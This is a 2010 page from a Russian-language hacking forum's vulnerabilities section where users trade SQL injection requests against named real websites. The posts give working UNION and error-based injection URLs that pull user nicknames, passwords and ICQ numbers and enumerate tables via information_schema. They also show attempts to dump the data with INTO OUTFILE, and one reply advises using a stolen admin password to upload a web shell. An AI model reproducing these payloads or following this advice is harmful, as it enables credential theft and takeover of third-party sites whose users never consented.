ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11951  
Старый 13.03.2010, 15:27
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Вот есть инъекция:
Код:
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,NickName,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,12+from+fusers+--+
При таком вводе отображаются ники и пассы юзеров. Хочу спросить это отображаются все юзеры? При вводе LIMIT вообще ничего нет.
И как слить базу этих пользователей?
 
Ответить с цитированием

  #11952  
Старый 13.03.2010, 15:30
ILYAtirtir
Участник форума
Регистрация: 25.04.2007
Сообщений: 176
Провел на форуме:
1957988

Репутация: 739
Отправить сообщение для ILYAtirtir с помощью ICQ
По умолчанию

Цитата:
Сообщение от YuNi|[c  
ну в information_schema.columns должны быть все имена колонок
Ну они там и есть,делается вот так:
Цитата:
http://www.bourdela.tv/?'or(select/**/1/**/from(select/**/count(0),concat((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/limit/**/0,1),floor(rand(0)*2))/**/from/**/information_schema.columns/**/group/**/by/**/2/**/limit/**/0,1)a)*'+--+
Дальше через лимит.Можно не перебирать а сделать вот так:
Цитата:
select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_schema='oemp'/**/and/**/table_name='oemp_members'/**/and/**/column_name/**/LIKE/**/'%pass%'
Код:
SQL/DB Error -- [Duplicate entry 'Password1' for key 1]
 
Ответить с цитированием

  #11953  
Старый 13.03.2010, 15:49
.:[melkiy]:.
Постоянный
Регистрация: 25.01.2009
Сообщений: 368
Провел на форуме:
5290740

Репутация: 912
По умолчанию

есть скуля. хочу вытянуть пароли от форума, но имя бд где лежат пассы содержит -. когда делаю запрос from db-forum.forum_user,то выдает синтаксическую ошибку( можно всё таки как-то вытащить пассы?

UPD: решил, `db-forum`.forum_user

Последний раз редактировалось .:[melkiy]:.; 13.03.2010 в 15:58..
 
Ответить с цитированием

  #11954  
Старый 13.03.2010, 16:07
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.
 
Ответить с цитированием

  #11955  
Старый 13.03.2010, 16:24
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.
нет прав или не туда льешь.
 
Ответить с цитированием

  #11956  
Старый 13.03.2010, 16:28
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Цитата:
нет прав или не туда льешь.
Что можно сделать в таком случае?
 
Ответить с цитированием

  #11957  
Старый 13.03.2010, 16:29
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
Что можно сделать в таком случае?
вытаскивать пас админа зайти под его учеткой и пробовать лить шел через админку...
 
Ответить с цитированием

  #11958  
Старый 13.03.2010, 16:33
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от CyberHunter  
http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,group_concat%280x0b,Nick Name,0x3a,PassWd,0x3a,ICQ%29,3,4,5,6,7,8,9,10,11,1 2+from+fusers+into+outfile+%271.txt%27+--+

Что не так? Выдает ошибку. Надо все записать в файл.
При INTO OUTFILE надо использовать полный путь.
 
Ответить с цитированием

  #11959  
Старый 13.03.2010, 16:39
CyberHunter
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
Провел на форуме:
1777031

Репутация: 256


Отправить сообщение для CyberHunter с помощью ICQ
По умолчанию

Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
 
Ответить с цитированием

  #11960  
Старый 13.03.2010, 16:42
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от CyberHunter  
Подскажите как сделать чтобы отобразились названия сразу всех таблиц?

Делаю так: http://www.f1-world.ru/news/news.php3?idnews=-1003090020+union+select+1,table_name,3,4,5,6,7,8,9 ,10,11,12+from+information_schema.tables+LIMIT+1,1 +--+

Но как-то не найс через лимит по одной смотреть.
скриптом каким нить сдампи структуру.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ